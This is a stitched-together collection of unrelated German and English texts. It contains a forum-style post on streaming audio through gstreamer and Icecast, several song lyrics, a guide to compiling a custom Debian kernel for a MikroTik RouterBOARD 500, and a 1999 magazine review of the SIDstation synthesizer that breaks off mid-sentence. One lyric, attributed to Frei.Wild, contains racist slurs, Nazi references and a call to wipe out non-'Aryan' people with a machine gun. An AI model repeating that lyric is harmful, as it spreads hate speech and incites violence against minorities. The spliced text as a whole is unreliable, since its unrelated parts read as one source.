Biber Zsolt - Dreamdance Version https://lab.spacecourt.org/jco-lol__internet.mp3
Also der Sound von gstreamer PIPE über ices client an Icecast hört sich (letzte woche version) echt gut an jetzt.
Ohne rauschen. Gut ich habe mono.
Aber trotzdem gut.
Leitung wird auf PAUSIERT gesetzt ...
Leitung ist aktiv und erfordert keinen VORLAUF …
Leitung wird auf ABSPIELEN gesetzt ...
New clock: GstPulseSrcClock
Verzögerung neu verteilen …
Verzögerung neu verteilen …
dualcore ~ # ./start_audio0_icecast.3-flash2
W: [pulseaudio] main.c: Dieses Programm sollte ohne die Option --system nicht als Administrator ausgeführt werden.
E: [pulseaudio] main.c: Start des Hintergrunddienstes fehlgeschlagen.
Leitung wird auf PAUSIERT gesetzt ...
Leitung ist aktiv und erfordert keinen VORLAUF …
Leitung wird auf ABSPIELEN gesetzt ...
New clock: GstPulseSrcClock
Verzögerung neu verteilen …
Verzögerung neu verteilen …
WARNUNG: Von Element /GstPipeline:pipeline0/GstPulseSrc:pulsesrc0: Der Ton kann nicht schnell genug aufgezeichnet werden
Zusätzliche Fehlerdiagnoseinformation:
/mnt/data2/tmp/portage/media-libs/gst-plugins-base-1.14.4-r1/work/gst-plugins-base-1.14.4/gst-libs/gst/audio/gstaudiobasesrc.c(849): gst_audio_base_src_create (): /GstPipeline:pipeline0/GstPulseSrc:pulsesrc0:
Dropped 9600 samples. This is most likely because downstream can't keep up and is consuming samples too slowly.
dualcore ~ # cat start_audio0_icecast.3-flash2
# Letting pulseaudio start below system rights with --system* param.
setting up a soundbridge.
# starting gstreamer-1.0 with shout-plugin AUTHENTICATION:
/root/audio-test-4-auth-opus.002
starting the icecast streaming server with AUTHENTICATION support:
at first, leaving away icecast start. the audio script does IT instead via openrc!
####icecast -c /etc/icecast2/icecast.xml -b
Making sure, all two configuration files have AUTH: ==>
Achso.
Dann wird noch pavucontrol gebraucht. Ich empfehle KDE. Das fluxbox geht nicht immer gut.
[detached from 7105.vpn]
dualcore ~ # eix -s pavucontrol
[I] media-sound/pavucontrol
Verfügbare Versionen: 3.0 ~4.0 {nls}
Installierte Versionen: 3.0(02:02:24 25.02.2018)(nls)
Startseite: https://freedesktop.org/software/pulseaudio/pavucontrol/
Beschreibung: Pulseaudio Volume Control, GTK based mixer for Pulseaudio
So, und jetzt: munteres Audio hören. (Ohne die Nachbarn zu stören) ;-)
Soll ich das evtl. in ein Wiki packen?
https://lab.spacecourt.org/maf_bouto-loop.mp3
Wenn dann alles stimmt, sollte dieses Lied "Bouto-Loop" auf beiden Ohren zu hören sein, - ohne Rauschen.
Evtl. in Pavucontrol auf "Simulanious Monitor" bei "Aufnahme" gehen.
Ferner: Stereo!
gst-launch-1.0 pulsesrc device=soundbridge.monitor ! audio/x-raw,channels=2 ! audioconvert ! opusenc ! oggmux ! shout2send ip=127.0.0.1 port=8008 username=username password="password" mount=mystream.opus
--
mfg,
Christian 'flash2' Fladung PS: Be __fast__ when opening pavucontrol and keep around 14% background noise for not canceling the pipe
Loikaemie - Merk dir meinen Namen
Es gibt die Journalisten
die schreiben für die Zeitung
Wahres oder nicht
das ist ihre freie Meinung
sie denken und können nicht denken
und sie haben keine Ahnung
und Dinge die sie hören
die stimmen aus Erfahrung
Da sitzt diese hohle Hülle - und schreibt
und ist sich sicher seiner Unberührbarkeit
wir sing die Wahrheit - voll Freude und Lust
die am Ende auch du noch akzeptieren musst
Merk dir meinen Namen - merk dir mein Gesicht
Denn ich bin der der nicht zufrieden ist
Ich merk mir deinen Namen - ich merk mir dein Gesicht
Denn du bist das Arschloch, das mir an die Karre pisst
Ich hör ihn laut schrein
nach mir rufen
Mir, ja mir
Soll´s an den Kragen gehn
Dieses Recht
ist doch nur für Ganoven
die mit einem Lächeln
durchs Leben gehn
Was nützt mir Meinungs, -freiheit, -sinn
wenn ich hier doch nur - unter Tauben bin
Wir sing die Wahrheit - voll Freud und Lust
die am Ende auch du noch akzeptieren musst
Merk dir meinen Namen - merk dir mein Gesicht
Denn ich bin der der nicht zufrieden ist
Ich merk mir deinen Namen - ich merk mir dein Gesicht
Denn du bist das Arschloch, das mir an die Karre pisst
Frech wie er ist
zeigt er weder Angst noch Scheu
Das wir nicht gefährlich werden können das wär mir neu
Wir könn vorbei komm und höflich
die Tür eintreten
Das wird dann wieder
ne Schlagzeile geben
Scheinbar hat man kein Recht - wenn Unrecht passiert
Wenn man sich Dreck - einfach von der Backe schmiert
Worte statt Taten - da bin ich euer Knecht
Denn hier ist für mich - Ende vom Recht
Merk dir meinen Namen ... ich kenne dein Gesicht
Frei.Wild - Schlauer als der Rest
Schlauer als der Rest
Ich scheiß auf den deutschen Staat
Will zurück zur Diktatur
Will mein freies Leben freier leben
Will ihn schwören diesen Schwur
Will, dass alles nur noch weiß ist
Will die Ordnung ganz auf deutsch
Bitte gib mir ein MG
Und ich tue ihnen weh
All die Leute, die nicht arisch sind und nichts als Unruhe stiften
Gebt mir ein MG und ich werde sie vernichten
Denn nur ich, ich bin in Ordnung
Und den Rest könnt ihr vergessen
Ich mit meiner Meinung ich gehöre zu den Besten
Ich bin Teil einer Elite, bin der Retter der Nation
Warum steht die Scheiß-Gesellschaft nicht zu ihrem Sohn
Wo ich doch eigentlich viel schlauer als der Rest bin
Und all die anderen nichts verstehen
Man kann die Dummheit in mir sehen
Ich will Tatsachen verdrehn und stets ganz außen stehen
Ich bin total gehässig, bin der Retter der Nation
Warum steht die Scheiß-Gesellschaft nicht zu ihrem Sohn
Wo ich doch eigentlich viel schlauer als der Rest bin
Ja, und ich bin Anarchist
Hoffe, dass ihr alle wisst
Niemand soll zu Deutschland stehen
Ich will es in Schutt und Asche sehen
Ja ich, ich scheiß auf Arbeit
Doch die Stütze will ich haben
Ihr werdet sehn in ein paar Jahren
APPD-Sieg bei den Wahlen
All die Leute die nicht links und zudem spießig sind
Hass ich auf den Tod, Anarchie gewinnt
Denn nur ich, ich bin in Ordnung
Und Den Rest könnt ihr vergessen
Ich mit meiner Meinung ich gehöre zu den Besten
Ich bin Teil der RAF, bin der Retter der Nation
Warum steht die Scheiß-Gesellschaft nicht zu ihrem Sohn
Wo ich doch eigentlich viel schlauer als der Rest bin
Und all die anderen nichts verstehen
man kann die Dummheit in mir sehen
Ich will Tatsachen verdrehen und stets ganz außen stehn
Ich bin total gehässig, bin der Retter der Nation
Warum steht die Scheiß-Gesellschaft nicht zu ihrem Sohn
Weil ich doch eigentlich viel schlauer als der Rest bin
Arbeitslos und Spaß dabei
Frei.Wild´s Meinung vogelfrei
Adolf Hitler, Ehrenmann, war ein Teil vom Arschloch-Clan
Deutschland ist ein Nazi-Land, hältst die Dummheit an der Hand
Neger, Neger, Schornsteinfeger
du bekloppter Türkenjäger
Und all die anderen nichts verstehen
Man kann die Dummheit in mir sehen
Ich will Tatsachen verdrehen und stets ganz außen stehen
Ich bin total gehässig, bin der Retter der Nation
Warum steht die Scheiß-Gesellschaft nicht zu ihrem Sohn
Weil ich doch eigentlich viel schlauer als der Rest bin
Rabauken - Hey mein Freund
Rabauken - Hey mein Freund
Es ist noch garnicht lange her
Ich denke gern an diese zeit
Du warst mir wie ein bruder
Alles haben wir geteilt
Doch dann trafst du diese frau
Als plötzlich alles anders war
Deine freunde nicht mehr wichtig
Und vergangenes nicht mehr wahr
Chor: hey hey hey mein freund
Merkst du nicht was du versäumst
Was du jeden tag verpasst
Und was du schon verloren hast
Hey mein freund
Hast du nie davon geträumt
Von den vielen schönen jahren
Als wir die besten freunde waren
Sie sieht ja wirklich super aus
Und ist bestimmt ganz gut im bett
Und sicher kann et´lecker kochen
Und auch sonst ist sie ganz nett
Doch die zeit mit deinen freunden
Ist vorbei und lange her
Hast du alles schon vergessen
Ja ist sie das denn wirklich wert
Konzerte parties fussballspiele
Und so manche schlägerei
Man konnte sich auf dich verlassen
Mit dir war man nie allein
Vielleicht kannst du uns jetzt hören
Und vielleicht verstehst du mich
Ich habe dich noch nicht vergessen
Und warte immer noch auf dich
Hey, hey mein freund hörst du mich
Denk an die alten zeiten und erinnere dich
Hey, hey mein freund dieses lied ist nur für dich
Hast du alles schon vergessen
Erinnerst du dich nicht
The MikroTikRouterBOARD 500 is a single
board computer, or SBC, which features a MIPS CPU and is able to run Debian
GNU/Linux from an internal Compact Flash (CF) Card. I thought this would be
an ideal replacement for my
old Pentium 133Mhz Internet gateway machine. The
RouterBOARD 500 sports 3 Ethernet ports (for my simple home network, Internet,
DMZ and internal LAN connections are therefore catered for) and consumes much less
power than the PC. It's also a fraction of the size, measuring just 14cm x14cm, plus
the case. Not only that, but compared to the Pentium, the RouterBOARD is even a step
up in terms of performance!
Having seen that MikroTik also provided CF images containing a pre-installed
Debian system, I took the plunge and bought one. For many people, these images
are great: simply use the dd utility to write the image to a CF card
(which you can access with an inexpensive CF reader for your PC), plug it into
the RouterBOARD and away you go. But for the rest of us, who like to customise
our systems to the max, the provided images just wouldn't do - I wanted to
replace the supplied kernel almost right away after finding out that many of the
cool features I was used to on my PC-based router/gateway weren't compiled in
and couldn't even be added as modules. Stuff like SSH and even syslogd didn't work
properly, because basic things like support for Unix domain sockets were lacking.
So, if you're like me and want to customise your RB-500's Debian installation,
you'll need a couple of things. First off, apart from the rather obvious items
such as the RouterBOARD itself and a suitable CF Card, you'll need a card reader.
I got an "internal" model which cost less that €20 and fits into
a 3.5" or 5.25" drive bay. The cable from this then leaves the case though
a spare PCI backplate and fits into an external USB slot. This sounds daft until you
realise you may need to dis/reconnect the thing now and again to refresh things. The CF
card and reader work through SCSI emulation, like USB thumb drives. When connected, the
kernel assigns the card a virtual SCSI block device, which you can then partition, format,
read from, write to and whatever.
See this guide to USB mass storage
for more info on how to get this side of things working.
Careful - potential loss of data!
On my IDE-based system, the CF card shows up as
/dev/sda - on your machine, especially if you're using Serial ATA or
SCSI equipment, this may be different!
Make sure you know which device has been assigned (check
the console output, for example) or you could end up overwriting
important data on your hard disk(s)!
The other thing you'll need is a Debian reference image from
MikroTik's RouterBOARD 500 page.
At time of writing, there are images for CF cards of 128Mb or 1Gb. The contents of the
filesystems on these images are pretty much (if not entirely) identical. Unfortunately,
cards of these sizes won't allways necessarily match the images byte for byte. For
example, my "1Gb" card has a capacity of 1,024,450,560 bytes, which doesn't
match the image, as we can see:
$ unzip rb500-1024.img.zip
$ ls -l rb500-1024.img
-rw-r--r-- 1 steve steve 1077608448 Mar 24 17:35 rb500-1024.img
Hmmm... so dd-ing this onto my CF card isn't going to work - it's simply
too big. Fortunately we can still access the data on the image by mounting the
appropriate partition through a loopback device. In order to do this, we need to
know a little about the geometry of the image. Something like fdisk will
do the job fine:
$ /sbin/fdisk -l rb500-1024.img
Disk rb500-1024.img: 1077 MB, 1077608448 bytes
16 heads, 63 sectors/track, 2088 cylinders
Units = cylinders of 1008 * 512 = 516096 bytes
Device Boot Start End Blocks Id System
rb500-1024.img1 1 8 4000+ 27 Unknown
rb500-1024.img2 9 2088 1048320 83 Linux
Ok, so we have two partitions: one of about 4Mb, which we'll come to later, and
another which takes up the rest of the 1Gb. We can see that the second
partition is of type 83 and therefore a regular Linux partition we can mount
on our machine. The problem is, we're dealing with a regular file here, not a block
device, so we need to figure our where in the image our partition starts. Thankfully,
we can work this out pretty easily from the above data using this formula:
Offset (in bytes) = Heads x Sectors x Cylinders x Block Size
16 x 63 x 8 x 512 = 4,128,768 bytes
So we can mount the partition like this:
# mkdir -p /mnt/cf
# mount -o loop,offset=4128768 rb500-1024.img /mnt/cf
# ls /mnt/cf
bin cdrom etc home lib mnt proc sbin tmp var
boot dev floppy initrd lost+found opt root sys usr vmlinux
Cool! There's what we were after - the root filesystem of the CF image. If
you just want to use the supplied kernel, but the image doesn't quite match
your CF card's size, it's merely a matter of:
dd-ing the first partition as-is to the CF card. We already know
it's 4,128,768 bytes, which is 8064 blocks of 512 bytes.
Repartitioning the CF card using fdisk, cfdisk or
whatever. I prefer cfdisk myself, but it doesn't seem to handle
bad partition tables too well. I used fdisk to remove the invalid
second partition, which ended after the end of the media, then cfdisk
to write the new partition table. I just made one large partition - using more
than two or three doesn't seem to work very well for some reason.
Making a filesystem on the new partition, and mounting it somewhere.
# mke2fs /dev/sda2
# mkdir -p /mnt/newcf
# mount /dev/sda2 /mnt/newcf
Copying the root filesystem to the partition, and umounting it.
# cp -a /mnt/cf/* /mnt/newcf
# umount /mnt/newcf
Your CF card can then be plugged into the RouterBoard. Set the boot device
to CF and away you go!
If, however, you want to use a custom kernel, or your CF card is a completely different
size than (and therefore has different geometry to) the image, things are a little trickier.
This can get pretty involved, depending on the level of customisation you want to achieve.
If you're new to Linux, you'll probably want to enlist a knowledgable freind to help you out.
Still up for it? Good - let's begin...
Unless you fancy compiling the kernel on the RouterBoard itself (which can be done
on a 1Gb CF card, although I wouldn't recommend it!) you'll need either another MIPS machine
or a cross-compiler to create mipsel-linux binaries, that is, binaries for the
little-endian MIPS architecture. This isn't too hard, especially if you follow
this HOWTO for Debian.
If you're using another OS or distro: Google
is your freind.
As if that wasn't enough, you'll need to apply the patch from
MikroTik's RouterBOARD 500 page.
To compile my kernel, I unpacked a fresh 2.4.29 tarball into /usr/src and
applied the patch there:
# cd /usr/src
# unzip linux-2.4.29.patch.zip
# patch -p0 < linux-2.4.29.patch
I also needed to edit /usr/src/linux-2.4.29/Makefile, setting "CROSS_COMPILE"
to "mipsel-linux" and reverting "kgcc" back to "gcc". I also
changed the "tool-prefix" in /usr/src/linux-2.4.29/arch/mips/Makefile back to
"mipsel-linux-". I then configured the kernel, using the default configuration
provided by the patch as a reference:
# cd /usr/src/linux-2.4.29
# cp config.mipsel .config
# make menuconfig
You may of course prefer to use a different method for configuring the kernel. The file
config.mipsel provides the correct configuration options for things like the CPU and
other built-in hardware. Surprisingly though, the via-rhine driver for the NICs was
not compiled in, so I enabled this.
Another problem I came across was setting the kernel parameters. Without the correct settings,
you'll end up with a kernel panic when you try to boot as things like the location of the root
filesystem are not known to the kernel. I've yet to study the mechanism used by the images
supplied by MikroTik for setting these options, so my current solution is to make use of
CONFIG_CMDLINE to hard-code the required values into the new kernel.
[Update: the much more elegant solution using objcopy is documented on the
MikroTik Wikihere.]
One snag is that
this option isn't directly supported by the architecture we're building the kernel for. I got
around this by editing around line 700 of arch/mips/kernel/setup.c like this:
This means we can copy the options specified in .config into the command line buffer
at boot time. Probably not the most elegant solution, but it works. The options themselves are
defined during configuration by enabling "Default bootloader kernel arguments" (under
"General setup") and setting the default parameter string. In any case, the resulting
.config should contain something like this:
This line is taken from the dmesg of a MikroTik Debian image. You'll probably want to
set kmac to the MAC address of the Korina NIC, as noted in the documentation supplied
with your routerboard (or on a sticker on the case, or the board itself).
With the configuration done, it's time to get compiling. If you're used to compiling on x86, note
that there's no bzImage target - vmlinux is what you need.
To save a few bytes,
the resulting kernel can be stripped, as shown. If you configured some modules, don't forget to
build them, too.
Careful - don't overwrite your host's own modules.
Of course, if your host machine is running the same kernel version, watch that you don't
overwrite your current modules! You can do this by temporarily moving the appropriate
subdirectory under /lib/modules out of the way.
# make deps
# make vmlinux
# mipsel-linux-strip vmlinux
# make modules
# make modules_install
If you're not working on a MIPS machine, you'll probably get a whole bunch of warnings if you
attempt to install the modules. This isn't a problem, as long as the modules are installed
to /lib/modules where we can get at them. Remember to copy the
subdirectory under /lib/modules on your host machine to the same
directory on the CF card.
OK: so you've got your kernel, but what are you meant to do with it now? As you probably guessed,
it's not just a matter of updating the bootloader - there isn't one, at least: not on the CF card,
so this next part can take a hack or two to complete. This example is based on the 1Gb image
featuring a 2.4.29 kernel, but it should apply to others. The whole process is detailed so that
it should be possible to figure out the required steps for future releases.
As we saw way back at the beginning, the CF image is split into two partitions. Whilst there's
a vmlinux in the root of the filesystem on the second partition, this isn't the
kernel which will be booted when we run off the CF card. The "live" kernel is
on that mysterious first partition, which fdisk tells us is of an unknown type.
The kernel image is simply written serially to the partition at a particular offset. So
in order to replace the kernel, we first need to know where it is.
First, lets see what we're meant to be looking for. Here's a dump of the first few bytes
of the vmlinux in the root filesystem on the second partition. This is a standard
ELF header.
Then let's have a look through the first partition of the image for ELF
headers. The parameter to head is calculated by divinding the size
of the partition in bytes by 16, the number of bytes hexdump prints
per line.
Thankfully, they're both slightly different. The second one matches that of the
vmlinux on the second partition, so this ought to be it! This can be
confirmed by comparing some more bytes after the header, which is left as an
exercise for the reader ;-)
So we now know that the "live" kernel starts at 0x7e00 in this image,
which translates to 32256 bytes in decimal, or 63 blocks of 512. We should therefore
be able to overwrite the kernel on our CF card directly like so:
Incidentally, the number of blocks we need to skip is equal to the number of
sectors per track on the device in question. This is also true for the 128Mb image,
although it of course pays to check the offset before dd-ing your kernel
into the wrong part of the CF card. For different-sized CF cards, you may need to
experiment with this value. If you get things running on such a card, please let me
know so I can amend this guide!
Phew! Assuming you got this far without too much hair loss, now's the moment of
truth. Stick the CF card into the RouterBOARD and, at startup, make sure the boot
device is set to CF. If you have the immense good fortune that it works first time:
congratulations - and you're welcome ;-) It took me a several attempts to get to this
stage, so I came across a few different errors:
Kernel panic: VFS: Unable to mount root fs on 01:00
This happens if you don't set the root kernel parameter, you set
it incorrectly, or you simply don't have a valid filesystem on there. Set the
option in CONFIG_CMDLINE as above, ensuring that CONFIG_CMDLINE_BOOL
is set to "y" to enable the option. Ensure the kernel will read the command
line in by editing arch/mips/kernel/setup.c. Make sure the root filesystem is
valid by mounting it using your trusty CF card reader. You didn't overwrite it with a
particularly large (> about 4Mb) kernel, did you?
Bootloader says: Not an elf header
The bootloader can't find the kernel image on the first partition of the CF card.
The chances are you've written it to the wrong place, or somehow overwritten
or corrupted the image. For 128Mb cards, the image should start at 0x4000 and for
1Gb cards 0x7e00. For other cards, I'm afraid you'll just need to experiment! A
good starting point seems to be:
512 bytes * Number of sectors per track on CF device
Other errors
Problems with the kernel can be difficult to diagnose as a lot of kernel messages,
especially those early on in the boot process, aren't sent to the serial port. Don't
be afraid to dive into the code and change some printk()s into panic()s,
which are output through the serial port. If all else fails, revert to a known-good
kernel configuration and gradually adjust your options to see what could be causing the
problem.
Another thing you may wish to consider when running Linux on your RouterBOARD is
making use of the onboard NAND storage. This usually contains MikroTik's RouterOS,
which you probably won't need any more. Indeed, if you're having trouble booting from
CF, this may be the solution to your problems as it's also possible to install a
custom kernel here and boot from NAND. The NAND also provides you with up to 64Mb of
non-volatile storage, should you be short of space on your CF card. If your installation
is small enough, you could install Linux directly to NAND and eliminate the need for
a CF card entirely.
To access the NAND storage, you'll need to create some device files in /dev,
like this:
# mknod /dev/mtd0 c 90 0
# mknod /dev/mtd1 c 90 2
# mknod /dev/mtdblocka b 31 0
# mknod /dev/mtdblockb b 31 1
The NAND chip, like the CF images, is split into two partitions - one of 4Mb and
another filling the rest of the device. The filesystem used is yaffs, so
your kernel will need to support this (the CF images' kernels do). Mounting is
as simple as:
# mkdir -p /mnt/nand1
# mount /dev/mtdblocka /mnt/nand1
In the first partition is a file named kernel which will be loaded if you
set the RouterBOARD to boot from NAND. You can therefore simply copy you own image
over this via a filesystem on the CF card.
erschienen in: GO64! - Das Magazin für wahre Computerfreaks, Ausgabe 3/99
Es begab sich einst um die Weihnachtszeit, da ereilte mich eine hilfesuchende
Mail. Es war unser lieber Onkel Wanja, der da schrieb: "Du, ich bin bis
über beide Ohren dicht. Und überhaupt, mit Musik kennst Du Dich
eh besser aus - magst Du nicht einen Artikel über die SIDstation schreiben?"
Wer könnte da schon nein sagen? Außerdem interessierte mich
das Ding doch gewaltig.
Wir alle kennen und lieben den Klang des SID als unverwechselbares Kennzeichen
des C64. Gerade dieser unverwechselbare Klang war es auch, der den C64
gegen seine grafisch gleichwertigen Konkurrenten Atari 600/800XL auszeichnete.
Später geriet dieser Klang jedoch in Vergessenheit und wurde durch
das Sampling verdrängt, welches es erlaubte, erstmals realistische
und naturgetreue Klänge auf dem Computer zu verwenden. Heute erlebt
der Klang des SID ein Revival, zahlreiche Websites mit SID-Tunes und die
Vielzahl von SID-Emulatoren auf unterschiedlichsten Computerplattformen
zeugen davon.
Bei einigen geht die Liebe zum SID-Sound offenbar weiter, denn eine
Gruppe von findigen Schweden kam auf die Idee, einen richtigen Synthesizer
auf Basis des SID zu entwickeln - die SIDstation war geboren.
Spezifikationen - Vorsicht, Technik!
Wer nun glaubt, die SIDstation sei nichts anderes als ein C64 im neuen
Gewand, der irrt. Es ist ein vollkommen eigenständiges Gerät,
welches darüberhinaus in einem sehr schmucken Gehäuse daherkommt.
Doch was steckt an Innereien drin? Prinzipiell besteht die SIDstation
aus einem Microcontroller vom Typ 68HC11, dem SID und der Betriebssoftware,
die der SIDstation in der vorliegenden Version folgende Fähigkeiten
verleihen:
3 Oszillatoren (SID)
5 Wellenformen (SID: Dreieck, Sägezahn, Rechteck, Rauschen und die
Mischwellenform Dreieck/Rechteck)
3 unabhängige ADSR-Hüllkurven (SID)
Multimode-Filter (SID: Tiefpass, Hochpass, Bandpass, Bandsperre)
mit Resonanz
Soweit nichts unbekanntes, jeder SID-Programmierer kennt das ja von entsprechenden
Composer-Tools oder Software-Synthesizern wie dem 1985 in der 64er veröffentlichten
"Modulator".
Nun kennen wir alle den Sound des SID, der zwar durchaus eigenständig
und kräftig ist - aber den direkten Vergleich mit professionellen
Synthesizern besser scheut. (Dies hat übrigens auch Bob Yannes, dem
Erfinder des SID und späteren Mitbegründer der Firma ENSONIQ,
keine Ruhe gelassen. So hat er in Interviews stets betont, dass der
SID durchaus besser zu machen gewesen wäre, jedoch der zeitliche Druck
schlichtweg zu hoch war.) Gewagte Sache also, die SIDstation nicht nur
mit "echten" Synthesizern wie Roland Juno 106 oder JP8000 zu vergleichen,
sondern sie auch noch qualitativ über diese zu stellen, wie dies von
den Entwicklern und Vertreibern der SIDstation auf ihrer Webpage (http://www.sidstation.com)
getan wird.
How to make it better
Um den vergleichsweise schlechten Originalsound zu verbessern, wurden folgende
Maßnahmen getroffen:
ausschließliche Verwendung von 6581-R4, der "besten" Fertigungsserie
des SID
Optimierung der externen Filterkondensatoren zur Erzielung maximaler Resonanzfähigkeit
des Filters
Trennung der digitalen und analogen Versorgungsspannung
Zugegeben, die Revision 4 des SID war die beste, auch ich habe meine C64
seinerzeit auf diese Fertigungsserie umgerüstet. Und durch die Verwendung
zweier Stromkreise begegnet man dem Problem, welches beim C64 stets für
ein 15kHz-Pfeifen im Audioausgang gesorgt hat, nämlich der Einstreuung
von Digitalsignalen in den Endverstärker. Eine Optimierung der Filterkondensatoren
ändert indes recht wenig am eigentlichen Klang des SID, so dass
man davon ausgehen muss, dass die SIDstation lediglich "sauberer"
klingt - am Klangverhalten an sich dürfte sich nichts geändert
haben, was die Klangbeispiele auf www.sidstation.com auch belegen.
Wer braucht die SIDstation?
Die Frage ist berechtigt, soll die SIDstation (sobald in Stückzahlen
lieferbar) doch für umgerechnet DM500.-- über die Ladentheke
gehen. Elektron ESI AB, der Hersteller und Vertreiber der SIDstation, formuliert
dies so:
"This is for people looking for a new sound.
If you just want some acid squelches or soft Juno pads, go and get a Rebirth
338 or JP-8000. The realtime control of the SID chip gives the SIDstation
its unique sound."
Sinngemäß übersetzt heißt dies, dass man sich
offenbar sehr genau darüber bewusst ist, dass die SIDstation
klanglich nicht mit vollwertigen Synthesizern mitzieht, die Eigenständigkeit
der SIDstation ergibt sich jedoch aus der Art der Programmierung des SID.
Wer sich die SIDstation-FAQ durchliest, wird übrigens generell
einen sehr harschen Ton gegenüber kritischen Fragen feststellen -
gepaart mit einigen terminologischen Ungereimtheiten, die für mich
Grund genug waren, mal nachzufragen.
Frage- und Antwort
Es wird mehrfach auf den einmaligen, unverwechselbaren Klang der SIDstation
hingewiesen, der durch eine eigene Synthese erzeugt werden soll. Nun wissen
wir alle, dass an der Synthese des SID nichts zu ändern ist.
Er hat 3 digitale (auf Basis von sog. Phasenakkumulatoren erzeugte) Oszillatoren,
welche nach erfolgter D/A-Wandlung über analoge Verstärker in
ein analoges Multimodefilter und einen analogen Gesamtverstärker geschickt
werden. Subtraktive Synthese in Reinkultur also - wie nun hier was ändern?
Des Rätsels Lösung ist einfach und heißt Marketing: Man
betrachtet die Miteinbeziehung des Arpeggiators in die Klangformung einfach
als Syntheseform... Weiterhin soll die totale Echtzeitkontrolle aller Parameter
Grund für diesen einmaligen Klang sein - nun frage ich mich allerdings,
was daran so einzigartig ist, denn diese Fähigkeiten bietet jeder
Uralt-Synthesizer bzw. via MIDI heutzutage ohnehin jedes Gerät.
Wer nun auf die Idee kommt, sowas könnte man doch leicht selbst
auf dem heimischen 64er basteln, dem wird sogleich abgeraten. Der C64 sei
dafür viel zu langsam. Das verwundert mich dann schon sehr, denn die
bereits erwähnte "Modulator"-Software funktionierte auf dem C64 in
Echtzeit - und war dabei synthesetechnisch wesentlich komplexer als die
SIDstation, ja es gab sogar einen Patch, mit dem spezielle Keyboards direkt
an den C64/Modulator angeschlossen werden konnte. Der Einwand, der C64
sei zu langsam, kann somit sicherlich in das Reich der Sagen und Märchen
verwiesen werden...
Viel Wert legen die SIDstation-Entwickler auf die einfache, intuitive
Bedienungsoberfläche der SIDstation. Diese stellt sich bei näherer
Betrachtung allerdings gar nicht als so spektakulär heraus - ein Endlosdrehrad
(auf neudeutsch "Alpha-Dial" genannt), 4 Echtzeitmodulatoren (Potis) sowie
ein Tastenfeld samt Cursorsteuerung. Erinnert mich spontan an den Bedienungs"komfort"
älterer Synthesizer-Expander und reißt mich demzufolge nun wirklich
nicht vom Sockel, einzig Composer, die nie etwas anderes als einen Tracker
gesehen haben, mögen da in spontanes Entzücken ausbrechen.
Wer sich nun denkt, dass Echtzeitregler im Zeitalter von MIDI ohnehin
obsolet sind, da der Sequencer die entsprechenden Parameter liefert, der
hat Pech. Die MIDI-Implementation ist derzeit eher rudimentär und
umfasst gerade mal das Notwendigste, nämlich Note an, Note aus,
Pitch Bend, Modulation Wheel und Programmumschaltung. Da eine aufwendigere
MIDI-Implementation derzeit nicht unbedingt Priorität genießt
(klar, erst muss einmal die Synthesesoftware komplett stehen), darf
man gespannt sein, ob und wann weitere Controller oder gar die totale Fernbedienung
der SIDstation via MIDI SysEx ihren Weg in die Software finden.
Wie klingt's denn nun?
Leider stand mir kein Testmuster zur Verfügung und derzeit wird auch
noch fleißig an der Software geschraubt, um zusätzliche Features
einzubauen. So konnte ich mich bei der Beurteilung nur auf die auf der
SIDstation-Webpage zur Verfügung gestellten Demosounds stützen,
die - im Interesse maximaler Werbewirksamkeit - sicherlich Glanzstücke
der SIDstation darstellen. Gerne hätte ich die SIDstation auch in
meinem Heimstudio in einem etwas größeren MIDI-Setup getestet,
um zu hören, wie sich die SIDstation im Zusammenspiel mit anderen
Geräten macht. Da dies allerdings nicht möglich war, muss
ich mich hier auf die Demo-Tunes von Tomas Danko und anderen stützen,
die ebenfalls via www.sidstation.com beziehbar sind.
Nun muss ich an dieser Stelle zugeben, dass ich diesen Artikel
zweimal geschrieben habe - und der erste wäre ein ziemlicher Verriss
geworden. Die älteren Klangbeispiele waren nämlich alles andere
als berauschend, geschweige denn spektakulär. Man hörte einen
auf Hochglanz polierten SID - und das war's dann allerdings auch schon
wieder. So erschien mir die Aussage von Daniel Hansson, dem geistigen Vater
der SIDstation, eher wie Realsatire, denn er schrieb mir folgendes...
"The unique sound of the SIDstation lays in its lo-fi character."
...und Lo-Fi war da sogar noch untertrieben, denn die SIDstation klang
einfach nur matschig und schlecht.
Zeit heilt alle Wunden, sagt ein altes Sprichwort. Und auch der SIDstation
hat die zusätzliche Zeit und das in dieser entstandene Betriebssystem-Update
gut getan. Die neuen Klangbeispiele sind ungleich lebendiger und aufregender
als die alten. Und während die SIDstation früher im Zusammenspiel
mit "richtigen" Synthesizern eher dumpf und fad klang, vermag sie sich
nun doch recht gut zu behaupten - und dies im positiven Sinne.
Allerdings muss man sich über eines im klaren sein: Die SIDstation
ist sicher kein Lead-Synthesizer, daran werden auch zukünftige Betriebssystem-Updates
nichts ändern - SID bleibt SID. Wer allerdings mit brachialen Rauhfaser-Bässen,
Effektsounds und dem unverwechselbaren Charme der Arpeggios (Broken-Chords)
liebäugelt, der schließt die SIDstation sicher schnell ins Herz.
Und wer schon immer einen SID-Player als Standalone-Gerät haben wollte,
der kommt an der SIDstation ohnehin nicht vorbei...
Zukunftsmusik
Wie bereits angesprochen, befindet sich die SIDstation eigentlich noch
im Alpha-Stadium. Die Hardware steht zwar schon, aber an der Software wird
fleißig geschraubt. Interessanterweise ergaben sich aus dem eMail-Verkehr
mit mir einige neue Aspekte, die ggf. in die Software mit eingearbeitet
werden sollen, als da wären:
Implementation einer Fernsteuerung der SIDstation via MIDI-SysEx
Unterstützung (weitgehend) aller MIDI-Controller
Implementierung eines Step-Sequencers
Implementierung von 4Bit-Sampling
Was es offenbar nicht geben wird, sind Software-Hüllkurven zur Steuerung
von z.B. Tonhöhe oder Filterfrequenz. Schade. Erstens müsste
man nur die "Modulator"-Sourcen studieren und zweitens ist dies schlichtweg
ein Muss, wie sonst sollte man "gezupfte", bläserartige oder
perkussive Klänge realisieren?
Apropos Klänge: Derzeit gibt es keine Möglichkeit, erstellte
Klänge außerhalb der SIDstation zu archivieren. Die einzige
Möglichkeit, diese dauerhaft (d.h. über die Lebensdauer der internen
Batterie hinweg) zu speichern, ist Papier und Bleistift - was übrigens
ebenfalls die einzige Möglichkeit ist, Klänge zwischen SIDstations
auszutauschen. Auch dies soll sich aber mit einer späteren Softwareversion
ändern, und so komme ich zum
Support
Support wird bei Elektron ESI AB groß geschrieben, wie ich selbst
am eigenen Leibe erfahren musste. Nicht nur, dass man auf eine
spätabends geschriebene Mail fast umgehend (!) eine Antwort erhält,
nein, man wird auch ständig per Mail-Verteiler auf dem neuesten Stand
gehalten. Bekommt man einmal ein "Liefern wir nach!" als Antwort, kann
